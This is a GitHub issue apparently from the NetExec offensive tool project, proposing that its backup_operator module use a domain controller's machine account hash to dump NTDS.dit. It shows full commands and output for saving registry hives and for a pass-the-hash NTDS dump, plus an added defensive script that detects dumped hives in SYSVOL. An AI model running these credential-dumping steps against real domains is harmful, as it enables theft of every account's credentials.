
Add option for backup_operator smb module to use the machine account to dump NTDS.dit #559

Open
Xorriath opened this issue Feb 8, 2025 · 2 comments

Comments

@Xorriath

Xorriath commented Feb 8, 2025

Please Describe The Problem To Be Solved
The smb module backup_operator fails to dump NTDS.dit when the local administrator account is disabled. I eliminated some lines below for visibility and redacted others.

nxc smb 192.168.210.16 -u '<user>' -p '<password>' -M backup_operator 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Windows Server 2022 Build 20348 x64 (name:ZPH-SVRCDC01) (domain:internal.zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] internal.zsm.local\<user>:<password>
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     [*] Triggering RemoteRegistry to start through named pipe...
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Saved HKLM\SAM to \\192.168.210.16\SYSVOL\SAM
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Saved HKLM\SYSTEM to \\192.168.210.16\SYSVOL\SYSTEM
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Saved HKLM\SECURITY to \\192.168.210.16\SYSVOL\SECURITY
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Copying "SAM" to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SAM"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] File "SAM" was downloaded to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SAM"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Copying "SECURITY" to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SECURITY"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] File "SECURITY" was downloaded to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SECURITY"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Copying "SYSTEM" to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SYSTEM"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] File "SYSTEM" was downloaded to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SYSTEM"
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33e<redacted>579aa53:::  
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d47a6d<redacted>e393948
SMB         192.168.210.16  445    ZPH-SVRCDC01     [-] internal.zsm.local\Administrator:5bdd6a33efe<redacted>579aa53 STATUS_LOGON_FAILURE 
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     [*] Use the domain admin account to clean the file on the remote host
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     [*] netexec smb dc_ip -u user -p pass -x "del C:\Windows\sysvol\sysvol\SECURITY && del C:\Windows\sysvol\sysvol\SAM && del C:\Windows\sysvol\sysvol\SYSTEM"

(Optional): Suggest A Solution
From the output above, it can be seen that the module also dumps the machine account hash which can be used to dump NTDS.dit as well. So there are 3 solutions for this:

  • The module dynamically detects that it cannot dump NTDS.dit as local administrator and then tries again using the machine account hash instead.
  • It can be added as an option to instruct the module to use the machine account hash instead of the local administrator when it tries to dump NTDS.dit
  • Always use the machine account hash to dump NTDS.dit

Of the 3 solutions, the first is likely the best.
Below is a demonstration of performing the attack with netexec --ntds, thanks to the backup_operator module also providing the machine account hash:

nxc smb 192.168.210.16 -u 'ZPH-SVRCDC01$' -H d47a6d90<redacted>14e393948 --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] y
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Windows Server 2022 Build 20348 x64 (name:ZPH-SVRCDC01) (domain:internal.zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] internal.zsm.local\ZPH-SVRCDC01$:d47a6d<redacted>514e393948 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.210.16  445    ZPH-SVRCDC01     Administrator:500:aad3b435b51404eeaad3b435b51404ee:543b<redacted>8a1760d5e:::
<SNIP>
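The hives the module saves to \\dc\SYSVOL (and the cleanup hint above) mean a DC that was targeted is left with SAM, SYSTEM and SECURITY files sitting in its SYSVOL share. As an added defensive check that is not part of NetExec or this issue, the script below walks a SYSVOL root and flags files that carry the registry hive signature, whatever they are named; the SYSVOL path and the sample tree are constructed assumptions.

```python
# Added defensive check (not NetExec code): find registry hives dropped into SYSVOL.
# Assumes a local copy or mount of the SYSVOL root; build_sample_sysvol() constructs one.
import os
import tempfile
from pathlib import Path

HIVE_NAMES = {"SAM", "SYSTEM", "SECURITY"}  # names the module saves to \\dc\SYSVOL\
REGF_MAGIC = b"regf"                        # signature at offset 0 of every registry hive file


def is_registry_hive(path: Path) -> bool:
    """True if the file begins with the 'regf' hive signature (renamed hives included)."""
    try:
        with path.open("rb") as fh:
            return fh.read(4) == REGF_MAGIC
    except OSError:
        return False


def find_dumped_hives(sysvol_root: str) -> list[dict]:
    """Walk the SYSVOL tree and report files named like, or structured as, registry hives."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            path = Path(dirpath) / name
            by_name = name.upper() in HIVE_NAMES
            by_magic = is_registry_hive(path)
            if by_name or by_magic:
                findings.append({
                    "path": str(path.relative_to(sysvol_root)),
                    "named_like_hive": by_name,
                    "regf_signature": by_magic,
                })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_sysvol() -> str:
    """Constructed sample: one benign GPO file, three dropped hives, one hive behind a benign name."""
    root = Path(tempfile.mkdtemp(prefix="sysvol_"))
    gpo = root / "internal.zsm.local" / "Policies" / "SampleGPO"
    gpo.mkdir(parents=True)
    (gpo / "GPT.INI").write_text("[General]\nVersion=1\n")
    for hive in HIVE_NAMES:
        (root / hive).write_bytes(REGF_MAGIC + b"\x00" * 60)
    (root / "notes.txt").write_bytes(REGF_MAGIC + b"\x00" * 60)  # renamed hive, caught by magic
    return str(root)


if __name__ == "__main__":
    for finding in find_dumped_hives(build_sample_sysvol()):
        print(finding)
```

Run it against the real SYSVOL root of a DC after an engagement or an alert; a non-empty result is a strong indicator that a Backup Operators hive save took place and was not cleaned up.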
@NeffIsBack
Contributor

Maybe the 3rd option would even be the best, as there won't be an AD with a disabled DC machine account, but there will definitely (or hopefully) be ones with the default DA disabled. @mpgn thoughts?

@mpgn
Collaborator

mpgn commented Feb 8, 2025

3rd option is the best, yes! But you will need to manually delete the files, so

  1. try with dom adm
  2. try with machine account
